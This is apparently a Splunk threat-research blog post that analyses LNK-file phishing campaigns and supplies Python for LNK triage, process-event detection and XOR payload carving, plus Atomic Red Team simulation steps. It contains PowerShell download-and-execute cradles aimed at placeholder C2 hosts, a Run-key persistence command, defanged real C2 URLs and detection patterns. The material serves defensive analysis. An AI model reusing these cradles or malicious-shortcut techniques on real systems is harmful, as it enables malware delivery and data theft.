LNK or Swim: Analysis & Simulation of Recent LNK Phishing | Splunk


LNK Phishing Campaign and Evolution

With that background covered, let’s delve into several active campaigns we’ve observed, each leveraging the .LNK file format as the initial trigger for initiating the infection chain on targeted hosts or systems.

  • We’ll explore the tactics, techniques, and procedures (TTPs) employed by threat actors in these campaigns.
  • Then, we’ll demonstrate how defenders can extract the contents of LNKs using tools such as LECmd.

TTPs in LNK Phishing Campaigns

Let’s look at the TTPs that threat actors in these campaigns use. This helps us to:

  • Gain insight into their methodologies.
  • Enhance our understanding of emerging threats.

Command and Scripting Interpreter (T1059.001)

In a typical phishing campaign, threat actors use a straightforward but effective approach: a malicious LNK file whose target and arguments carry a script or command line, so that a single click runs it.

For instance, clicking the deceptive LNK file, disguised as a document titled ‘INVOICE#BUSAPOMKDS03’, initiates a chain of events.

Upon execution, the LNK file runs a command that copies a malicious file.bat from a remote domain to %USERPROFILE%\Music\file.bat on the targeted host. This seemingly innocuous step culminates in the deployment of malware, in this case AsyncRAT, compromising the victim’s system. Figure 01 shows the deceptive LNK file at the heart of this phishing scheme.

Figure 01: AsyncRAT LNK Phishing Campaign

Data Encoding (T1132)

Rhadamanthys (1)(2), a Trojan Stealer, is another example of malware leveraging .LNK files in its phishing campaign. These specially crafted LNK files contain an embedded Base64-encoded PowerShell script designed to download a file from a malicious Command and Control (C2) URL, serving as the initial step in its attack chain.

Figure 02 illustrates how this deceptive .LNK file employs a notepad icon to entice users into clicking the malicious file, thereby initiating the attack.

Figure 02: Rhadamanthys LNK Phishing Campaign

After decoding the Base64 string, we find a short PowerShell script. It downloads a second PowerShell script and runs it with Invoke-Expression, so the real payload is fetched at run time rather than stored in the LNK.

Figure 03: Rhadamanthys LNK Decoded PowerShell

Obfuscated Files or Information (T1027)

Another technique commonly seen in phishing LNK campaigns is obfuscation of the script the LNK executes, whether PowerShell or batch.

Figure 04 shows a Ducktail LNK campaign that uses the caret (^) symbol as an obfuscation technique. In cmd.exe the caret is an escape character, so ‘p^o^w^e^r^s^h^e^l^l’ still runs as ‘powershell’, while the inserted carets break up the command to hinder readability and evade simple string matching by security tools.

Figure 04: Ducktail LNK phishing campaign

Using CyberChef, we can decode the encoded string to reveal its contents, which include a command to download another file from its C2 server, extending the attack chain.

Figure 05: Ducktail LNK Decoded PowerShell
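Both decodings above (the Base64 PowerShell in the Rhadamanthys LNK and the caret-split command in the Ducktail LNK) start from the same place: the arguments stored in the LNK’s StringData. The Python below is an added example, not code from this post or from LECmd. It builds a sample LNK in memory (the cmd.exe target, the placeholder URL and the notepad icon are made up for the demonstration), parses the MS-SHLLINK header and StringData, strips cmd.exe carets, decodes a -EncodedCommand argument, and reports which indicators the recovered command trips.

```python
"""Parse a .LNK the way a triage tool does and surface the command it will run.
Added example (not the post's code); the sample LNK is constructed in memory."""
import base64
import re
import struct
import uuid

# MS-SHLLINK: ShellLinkHeader is 0x4C bytes; LinkFlags select which structures follow it.
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_IDLIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
               ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
               ("icon_location", HAS_ICON_LOCATION)]   # fixed on-disk order


def build_lnk(relative_path, working_dir, arguments, icon_location):
    """Smallest useful Unicode LNK: header + StringData, no IDList/LinkInfo (constructed)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ARCHIVE attr, SW_SHOWNORMAL
    body = b""
    for s in (relative_path, working_dir, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")  # CountCharacters + chars
    return header + body


def parse_lnk(data):
    """Validate the header, skip IDList/LinkInfo by their size prefixes, return StringData."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 0x4C
    if flags & HAS_IDLIST:        # IDListSize (2 bytes) precedes the item ID list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:     # LinkInfoSize (4 bytes) counts the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"flags": flags}
    width = 2 if flags & IS_UNICODE else 1
    for name, bit in STRING_DATA:
        if not flags & bit:
            continue
        if off + 2 > len(data):
            raise ValueError(f"truncated before {name}")
        count = struct.unpack_from("<H", data, off)[0]
        raw = data[off + 2: off + 2 + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {name}")
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        off += 2 + count * width
    return fields


def strip_carets(cmdline):
    """cmd.exe treats ^ as an escape: 'p^o^w' runs as 'pow' and '^^' is one literal caret."""
    return re.sub(r"\^(.)", r"\1", cmdline)


# -EncodedCommand may be abbreviated (-e, -ec, -enc, ...); the value is base64 of UTF-16LE text
ENC_RE = re.compile(r"(?i)[-/]e(?:c|n(?:c|coded|codedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = {  # heuristics drawn from the samples above; matched against a lowercased haystack
    "iex": r"\biex\b|invoke-expression",
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "lolbin": r"\bforfiles\b|\bexpand\b|\bmshta\b",
}


def decode_encoded_command(cmdline):
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_lnk(data):
    """Parse, de-caret, decode -EncodedCommand, and score the result against INDICATORS."""
    fields = parse_lnk(data)
    args = strip_carets(fields.get("arguments", ""))
    decoded = decode_encoded_command(args)
    # search the visible arguments (base64 blob masked out) plus the decoded script
    hay = (ENC_RE.sub(" <encoded> ", args) + " " + (decoded or "")).lower()
    found = [k for k, p in INDICATORS.items() if re.search(p, hay)]
    if decoded is not None:
        found.append("encoded_command")
    fields.update(deobfuscated_arguments=args, decoded_command=decoded, indicators=sorted(found))
    return fields


def make_sample():
    """Constructed sample: cmd.exe target, caret-split 'powershell', base64 download cradle
    with a placeholder URL, notepad icon as the decoy."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/stage2.ps1')"
    enc = base64.b64encode(script.encode("utf-16-le")).decode()
    return build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32",
                     f"/c p^o^w^e^r^s^h^e^l^l -w hid^den -e^n^c {enc}",
                     "%SystemRoot%\\System32\\notepad.exe")


if __name__ == "__main__":
    for k, v in triage_lnk(make_sample()).items():
        print(f"{k}: {v}")
```

Real samples usually also carry a LinkTargetIDList and LinkInfo; the parser skips both by their size prefixes, so the StringData offsets stay correct, and LECmd will show the same arguments field plus the target from those structures.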

Reconnaissance (TA0043)

Furthermore, threat actors have built .LNK samples tailored to reconnaissance of the target host. Upon execution, these .LNK files run PowerShell scripts that collect extensive system information, including:

  • Processor specifications
  • Computer name
  • Current user
  • Loaded modules
  • Process list
  • Memory usage
  • MAC address
  • Registry size
  • IP address

Such reconnaissance gives the threat actor the intelligence needed to choose follow-on activity.

Figure 06: LNK Recon

The reconnaissance operation saves all gathered system information, converts it into JSON format, and then transmits it to the C2 server controlled by the threat actor.

Figure 07: Recon Information

In addition, this .LNK file uses the PDF icon and embeds a dummy PDF file within its structure, so it passes for a PDF document. This deceptive appearance increases the likelihood that the target user clicks the LNK and compromises the host.

Figure 08: Embedded PDF file

Indirect Command Execution (T1202)

Malicious .LNK files can abuse Windows utilities to sidestep restrictions and monitoring aimed at the command-line interpreters themselves. Because the interpreter is started by a legitimate utility rather than directly by the shortcut, detections that key only on direct command execution can miss it, and the outcome is the same unauthorized access or data compromise.

Figure 09 depicts a malicious LNK file observed in the wild. It uses forfiles, a legitimate Windows utility and a known Living Off the Land Binary (LOLBIN), to execute a PowerShell script that downloads a malicious payload packaged as a ZIP file. Once executed, this payload is deployed on the compromised host, enabling further malicious activity by the threat actor.

Figure 09: LNK uses Forfiles LOLBIN
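To check whether process telemetry would catch the chains described on this page (the forfiles launcher here, an explorer-launched interpreter carrying an encoded command, expand.exe unpacking a dropped CAB, and a Run-key addition), the Python below evaluates a handful of constructed process-creation events that use the Sysmon Event ID 1 field names ParentImage, Image and CommandLine. It is an added example, not Splunk’s detection content; the hosts, URLs, paths and the Run-key value are invented, and the one legitimate forfiles cleanup event shows why the forfiles rule requires the /c command to invoke PowerShell or carry a URL.

```python
"""Process-creation checks for LNK-driven chains, evaluated over constructed events.
Added example; not Splunk's detection content."""
import base64
import re

ENC = r"[-/]e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}"          # -EncodedCommand and prefixes
CRADLE = r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
RUN_KEY = r"\\currentversion\\run\b"
USER_WRITABLE = r"\\users\\public\\|\\appdata\\|\\temp\\"
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe")

# Constructed events with Sysmon Event ID 1 field names. Hosts, URLs, paths and the Run-key
# value are made up; UHCYbG.cab and svchostno2 are the names seen in the sample on this page.
_ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://c2.example/a.ps1')"
                        .encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f"powershell -w hidden -enc {_ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r'forfiles /p C:\Windows\System32 /m notepad.exe /c "powershell -w hidden '
                    r'-c iwr http://c2.example/p.zip -OutFile C:\Users\Public\p.zip"'},
    {"ParentImage": r"C:\Windows\System32\forfiles.exe", "Image": PS,
     "CommandLine": r"powershell -w hidden -c iwr http://c2.example/p.zip -OutFile C:\Users\Public\p.zip"},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\expand.exe",
     "CommandLine": r"expand C:\Users\Public\UHCYbG.cab -F:* C:\Users\Public"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchostno2 '
                    r'/t REG_SZ /d "C:\Users\Public\stage.bat"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\Desktop\invoice.txt"},            # benign
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r'forfiles /p C:\Logs /m *.log /d -30 /c "cmd /c del @file"'},  # benign cleanup
]


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev):
    """Return the names of the rules the event matches (empty list means nothing to report)."""
    parent, image, cmd = _base(ev["ParentImage"]), _base(ev["Image"]), ev["CommandLine"].lower()
    hits = []
    # T1204.002: a double-clicked LNK makes explorer.exe the parent of the interpreter it runs
    if parent == "explorer.exe" and image in INTERPRETERS and re.search(ENC + "|" + CRADLE, cmd):
        hits.append("explorer_launches_encoded_interpreter")
    # T1202: forfiles /c used as a launcher. Admin cleanups such as /c "cmd /c del @file" are
    # tuned out by requiring the /c command to invoke PowerShell or carry a URL.
    if image == "forfiles.exe" and re.search(r'/c\s+"?.*?(powershell|pwsh|http)', cmd):
        hits.append("forfiles_indirect_execution")
    if parent == "forfiles.exe" and image in ("powershell.exe", "pwsh.exe"):
        hits.append("forfiles_spawns_powershell")
    # the sample's expand.exe step: a CAB unpacked into a user-writable location
    if image == "expand.exe" and "-f:*" in cmd and re.search(USER_WRITABLE, cmd):
        hits.append("expand_cab_to_user_writable")
    # T1547.001: Run-key persistence written by reg.exe
    if image == "reg.exe" and " add " in cmd and re.search(RUN_KEY, cmd):
        hits.append("run_key_persistence")
    return hits


def detect_all(events):
    return [detect(ev) for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(EVENTS, detect_all(EVENTS)):
        print(f"{_base(ev['ParentImage'])} -> {_base(ev['Image'])}: {hits or 'clean'}")
```

The parent/child pairing matters more than the command-line strings: the forfiles sample’s PowerShell never has explorer.exe as its parent, so a rule that only looks for explorer.exe launching an interpreter would miss it while the second forfiles rule still fires.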

User Execution: Malicious File (T1204.002)

In this section, we analyze and reverse engineer a more intricate malicious LNK file than the examples explored so far, dissecting each tactic and technique it employs once the user executes it.

When executed, this LNK file triggers a PowerShell script that uses obfuscation techniques such as caret (^) symbols and string comments to obscure its functionality and evade detection during static analysis.

Figure 10: LNK Obfuscated PowerShell

After reverse engineering and de-obfuscating the script, we found that the PowerShell component extracts a series of bytes from the LNK file itself and decrypts them with XOR. The decrypted data is used to create two files:

  • One is a dummy DOCX file, leveraging the icon to masquerade as a legitimate document.
  • The other, a .CAB archive, is dropped as ‘$env:public\UHCYbG.cab’ and contains multiple malicious files that continue the attack chain.

Figure 11 illustrates the encrypted data within the payload and its decrypted form after XOR decryption.

Figure 11: Decrypted Files
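The decryption step above can be reproduced generically when the key is not known. The Python below is an added example, not this post’s code: the host bytes, the one-byte key (0x5A) and the offsets are constructed, and the decoy ‘DOCX’ and ‘CAB’ contain filler rather than real archives. It recovers a single-byte XOR key by known plaintext (the magic bytes of the formats seen in these samples: MSCF for CAB, PK for ZIP/DOCX, %PDF for the decoy PDF of the recon sample), carves each blob, and trims the CAB to the size its own CFHEADER declares. The page does not state the real sample’s key length or offsets, so the single-byte assumption is the example’s, not the author’s finding.

```python
"""Carve XOR-encrypted payloads embedded in a host file via known-plaintext magics.
Added example (not the post's code); host bytes, key and offsets are constructed."""
import struct

MAGICS = {b"MSCF": "cab", b"PK\x03\x04": "zip/docx", b"%PDF": "pdf"}


def xor_bytes(data, key):
    """XOR with a repeating key; the recovery below assumes a one-byte key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def find_xored_magics(data, magics=MAGICS):
    """At each offset, the key that maps data[i] to magic[0] must also map the following
    bytes onto the rest of the magic. Key 0 means the file was embedded in cleartext."""
    hits = []
    for magic, kind in magics.items():
        for i in range(len(data) - len(magic) + 1):
            key = data[i] ^ magic[0]
            if all(data[i + j] ^ key == magic[j] for j in range(1, len(magic))):
                hits.append((i, key, kind))
    return sorted(hits)


def carve(data, hits):
    """Decrypt from each hit to the next hit (or EOF). A CAB states its total size in
    CFHEADER.cbCabinet at offset 8, so it is trimmed exactly; ZIP/PDF stay bounded by
    the next hit."""
    carved = []
    for n, (off, key, kind) in enumerate(hits):
        end = hits[n + 1][0] if n + 1 < len(hits) else len(data)
        blob = xor_bytes(data[off:end], bytes([key]))
        if kind == "cab" and len(blob) >= 12:
            cb = struct.unpack_from("<I", blob, 8)[0]
            if 36 <= cb <= len(blob):   # 36 bytes is the minimum CFHEADER size
                blob = blob[:cb]
        carved.append({"offset": off, "key": key, "kind": kind, "data": blob})
    return carved


def make_sample(key=0x5A):
    """Constructed host: an LNK-sized dummy header, then a decoy 'DOCX' and a 'CAB'
    (filler contents) XOR-encrypted with one byte, then slack bytes."""
    host = b"L\x00\x00\x00" + b"\x11" * 72
    docx = b"PK\x03\x04" + b"decoy-document-filler" * 3
    folders = b"\x00" * 8 + b"cab-filler" * 4          # stands in for CFFOLDER/CFFILE/CFDATA
    cab = b"MSCF" + b"\x00" * 4 + struct.pack("<I", 12 + len(folders)) + folders
    k = bytes([key])
    return host + xor_bytes(docx, k) + xor_bytes(cab, k) + b"\x00" * 16


if __name__ == "__main__":
    sample = make_sample()
    for item in carve(sample, find_xored_magics(sample)):
        print(f"offset={item['offset']} key=0x{item['key']:02x} kind={item['kind']} "
              f"size={len(item['data'])} head={item['data'][:8]!r}")
```

Against a real LNK the same search is run over the whole file; the hits give both the offset the PowerShell loader reads from and the key it uses, which can then be compared with the constants recovered from the de-obfuscated script.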

Next, the PowerShell component extracts the contents of the .CAB file with “expand.exe”, the built-in Windows command-line tool for expanding compressed files.

Below is a comparison of the partly deobfuscated function versus the renamed function of the LNK PowerShell script responsible for extracting the decrypted .CAB file:

Partly deobfuscated function:

##
function koMIoWakvBvW
 {
   param($FMGlWEFVsTs, $esLEposvvv);
   expand $FMGlWEFVsTs  -F:* $esLEposvvv;
 };

Deobfuscated and renamed version:

function mw_expand_cab_file
 {
   param($param_src_cab_file_path, $param_dest_cab_file_path);
   expand $param_src_cab_file_path  -F:* $param_dest_cab_file_path;
 };

After extracting the .CAB file, several files appear within it. The LNK’s PowerShell script locates ‘start.vbs’ and executes it to continue its malicious activity on the compromised host. Below is a brief overview of each file and its purpose:

unzip.exe:

This is an extraction utility for archives compressed in .zip file format.

Start.vbs:

This VBScript executes 49120862.bat through the ShellWindows COM object, referenced by its CLSID.

49120862.bat:

This batch file adds the registry run key value “svchostno2” under “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” and executes several other batch files: 78345839.bat, 47835693.bat, and 30440211.bat.

78345839.bat:

This batch file downloads another zip file named “di3726.zip” from one of its C2 servers, hxxps[:]//goosess[.]com/read/get[.]php, and extracts it with unzip.exe.

After extraction, the batch file deletes the archive from the host with the following command: del /f /q %~dp0%fn%.zip > null. As written, “> null” redirects output to a file named null in the working directory rather than to the NUL device, leaving a small artifact behind.

47835693.bat:

This batch file collects, encrypts, and sends system information and a list of files from the user’s Downloads, Documents, and Desktop folders to one of its C2 servers. Figure 12 depicts a screenshot of the relevant code snippet.

Figure 12: Collect data

30440211.bat:

This batch file downloads, decrypts, and extracts another .CAB file from one of its C2 servers, hxxp[:]//stuckss[.]com/list[.]php?f=%COMPUTERNAME%[.]txt. It then deletes the downloaded .CAB file.

60712945.bat:

This batch file executes a PowerShell script that takes two parameters: a URL from which it downloads an RC4-encrypted file, and the filename to which the decrypted content is saved.

99548182.bat:

This batch file triggers a PowerShell script that takes a file path as its first parameter, RC4-encrypts the data, and sends it via HTTP POST to the C2 server given as its second parameter.

30606240.bat:

This batch file changes the current working directory to the directory containing the batch file, retrieves the first item found in the specified first parameter, and saves that output to the file specified in its second parameter.

Figure 13 illustrates the attack chain of this malicious LNK file.

Figure 13: LNK Attack Chain


Simulating LNK Phishing Campaigns

As defenders, we need to test our defenses, whether analytics, XDR or AV products, to ensure they are properly tuned and detect or prevent malicious LNK usage.

In this section, we’ll share how you can test your detections in three ways:

  • Using Atomic Red Team.
  • Using LNK Generator.
  • Embedding CAB Files in LNKs.

Atomic Red Team

Let’s dive into Atomic Red Team and look at T1547.009 Test Number 2. This test uses PowerShell to create a .LNK file in the user’s Startup directory; at the next logon, cmd.exe spawns.

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()

Using Invoke-AtomicTest we can view the test running:

Invoke-AtomicTest T1547.009 -ShowDetails -TestNumbers 2

Figure 14: Invoke Atomic test in Splunk Attack Range

Next, we can run the Atomic:

Invoke-AtomicTest T1547.009 -TestNumbers 2

Figure 15: T1547.009 (Invoke Atomic test in Splunk Attack Range, Splunk 2024)

As simple as that, we have written a LNK to the Startup folder, which will run and start cmd.exe the next time the user logs on.

Now, we can run Atomic Red Team tests all day and write LNKs and run them, but what if we want to go a bit above and beyond using the Atomic Execution Framework? With that, we present to you two utilities to assist with testing your defenses against more interesting LNK behaviors:

  • LNK Generators
  • Embedded CAB Files

LNK Generator

LNK Generator is a tool that simplifies creating desktop shortcuts via an HTA file. This utility demonstrates the versatility of shortcuts in Windows, enabling actions from launching command lines to executing scripts.

We will highlight two functionalities:

  • A CMD shortcut that opens a Command Prompt.
  • A PowerShell script shortcut that downloads and executes an MSI package.

These examples show how shortcuts can range from simple utilities to complex operations, making the LNK Generator a practical tool for defenders looking to test their defenses.

How LNK Generator Works

Click the desired button to drop the corresponding LNK on your desktop, then click the LNK to observe its action. This shows how shortcuts can be created dynamically and used in a Windows environment.

You can retrieve the LNK Generator utility here.

Save and run the .HTA file in your lab environment. Once opened, you will see the interface:

Figure 16: LNK Generator (Splunk 2024)

We will demo two of the options.

First, click “Create CMD Shortcut” to write a .LNK to the desktop.

Figure 17: LNK shortcut (Splunk 2024)

Next, double-click the CmdShortcut file; a new Command Prompt window appears. Right-click the LNK and open its properties, and you’ll see that the Target is cmd.exe, as expected.

Figure 18: LNK shortcut (Splunk 2024)

Now, let’s check out “Create PowerShell Script Shortcut”. This option creates an LNK whose Target runs PowerShell with -EncodedCommand, downloading an MSI package from Atomic Red Team.

Figure 19: LNK shortcut (Splunk 2024)

Right click the LNK and review the Target:

Figure 20: LNK shortcut (Splunk 2024)

Here the Target includes the PowerShell -EncodedCommand. Below, in Notepad++, we see the full command and its decoded, non-Base64 form.

With that, double-click the LNK: the MSI downloads and runs.

Figure 21: LNK shortcut (Splunk 2024)

Embedded CAB File in .LNK File

Another Atomic test we will share simulates a malicious .LNK file that incorporates an encrypted CAB file alongside a dummy document.

The brief video demonstration below shows how the Splunk Threat Research Team applied reverse engineering to a particularly interesting .LNK file. The analysis allowed us to replicate a broad spectrum of notable TTPs observed during the investigation. Examining this LNK, with its embedded files, gave us insights that were vital for our detection development and testing.

Source: https://www.splunk.com/en_us/blog/security/lnk-phishing-analysis-simulation.html